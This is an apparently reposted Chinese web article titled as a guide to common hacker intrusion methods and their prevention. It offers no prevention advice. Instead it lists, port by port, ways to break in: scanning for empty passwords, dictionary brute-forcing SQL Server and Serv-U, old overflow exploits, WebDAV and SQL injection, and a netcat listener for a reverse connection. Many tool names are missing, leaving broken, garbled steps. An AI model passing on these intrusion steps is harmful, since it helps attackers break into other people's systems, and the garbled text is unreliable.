admin管理员组文章数量:1567522
2024年7月14日发(作者:)
常见的黑客入侵方法与防范
本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法,希望能对大家有所帮
助,以助于大家能更好地防御黑客的攻击,下面店铺来告诉你吧!
1. 利用4899端口入侵
4899端口是一个远程控制软件(remote administrator)服务端监听的端口,他不能
算是一个木马程序,但是具有远程控制功能,通常杀毒软件是无法查出它来的
用4899过滤器.exe,扫描空口令的机器
2. 利用3899的入侵
对很早的机器,可以试试3389的溢出
对2000的机器,可以试试字典暴破。
3.利用1433端口入侵
1433端口,是SQL Server默认的端口,SQL Server服务使用两个端口:TCP-1433、
UDP-1434。其中1433用于供SQL Server对外提供服务,1434用于向请求者返回SQL
Server使用了哪个TCP/IP端口。
查有1433的机器
进行字典暴破(字典是关键)
最后 入侵
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口 入侵ip 1433 本机ip 本机端口
(以上反向的,测试成功)
入侵ip 1433 (这个是正向连接)
4. 利用80端口入侵
80端口是为HTTP(HyperText Transport Protocol)即超文本传输协议开放的,此为
上网冲浪使用次数最多的协议,主要用于WWW(World Wide Web)即万维网传输信息的
协议。可以通过HTTP地址(即常说的“网址”)加“:80”来访问网站,因为浏览网页服务
默认的端口号都是80,因此只需输入网址即可,不用输入“:80”了。
对sp3以前的机器,可以用webdav入侵;
对bbs论坛,可以试试上传漏洞(或dvup_)
可以利用SQL进行注入。(小榕的注入软件)。
5. 利用serv-u入侵(21端口)
21端口主要用于FTP(File Transfer Protocol,文件传输协议)服务,FTP服务主要是
为了在两台计算机之间实现文件的上传与下载,一台计算机作为FTP客户端,另一台计算
机作为FTP服务器,可以采用匿名(anonymous)登录和授权用户名与密码登录两种方式
登录FTP服务器。
对5. 004及以下系统,可用溢出入侵。()
对5.1.0.0及以下系统,可用本地提升权限。()
对serv-u的MD5加密密码,可以用字典暴破。()
输入一个被serv-u加密的密码(34位长),通过与字典档()的比较,得到密码。
如:cscript ib0AD10648F17E9E8D1FF316C1BA75105A
6. 利用554端口
用入侵。
7. 利用6129端口
用入侵。
8. 利用系统漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
进行溢出入侵。
9. 利用3127等端口
可以利用doom病毒开的端口,用入侵。(可用查)。
10. 利用其他入侵
利用shanlu的入侵软件入侵()。
版权声明:本文标题:常见的黑客入侵方法与防范 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.elefans.com/xitong/1720964572a852858.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论